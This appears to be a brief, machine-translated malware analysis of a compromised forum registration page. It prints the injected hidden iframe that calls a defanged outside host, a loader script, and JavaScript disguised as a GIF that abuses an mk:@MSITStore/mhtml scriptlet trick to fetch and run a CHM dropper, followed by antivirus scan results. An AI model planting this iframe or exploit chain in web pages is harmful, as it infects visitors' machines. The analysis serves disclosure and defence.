EndurerOriginal
1Version
Webpage: hxxp: // www. **** ai49.com/bbs/reg.asp
There are two inserted codes: <IFRAME Height = 0 width = 0 src = "hxxp: // down. *** gament.net/q/f"> </iframe>
Hxxp: // down. *** the gament.net/q/f code is:
<Script language = "JavaScript" src = "Ah. js"> </SCRIPT>
The code for ah. JS is:
Gif89a
VaR gif89a = document. location. href; gif89a = gif89a. substring (0, gif89a. lastindexof ('/'); document. write ('<object width = 0 Height = 0 style = "display: none;" type = "text/X-scriptlet" Data = "MK: % 40 msitstore % 3 amhtml % 3ac % 3A // % 2 emht % 21 '+ gif89a +' % 2f1. JS:/% 23 "> </Object> ');
Impersonate a GIF file and download and run 1.js.
1. JS is actually a CHM file, which will release/run the. exe file. Kaspersky reportsTrojan-Downloader.Win32.Delf.aetThe rising report isTrojan. DL. Small. Hm.
File: |
1. js |
Status: |
Infected/malware |
MD5 |
617449ed78325096128e604f1e9f9d30 |
Packers detected: |
- |
Scanner results |
AntiVir |
Found heuristic/Trojan. downloader (probable variant) |
Arcavir |
Found Trojan. Downloader. Delf. AET |
Avast |
Found nothing |
AVG AntiVirus |
Found nothing |
BitDefender |
Found Trojan. html. gamect. A, Trojan. Downloader. Delf. AET |
ClamAV |
Found exploit. html. ObjCode-2 |
Dr. Web |
Found exploit. codebase, Trojan. downloader.6966 |
F-Prot AntiVirus |
Found html/objcode @ expl |
Fortinet |
Found nothing |
Kaspersky Anti-Virus |
Found Trojan-Downloader.Win32.Delf.aet |
NOD32 |
Found Win32/trojandownloader. Small. AAO, Win32/trojandownloader. Delf. AET |
Norman Virus Control |
Found nothing |
Una |
Found nothing |
Virusbuster |
Found nothing |
Vba32 |
Found Trojan-Downloader.Win32.Delf.aet |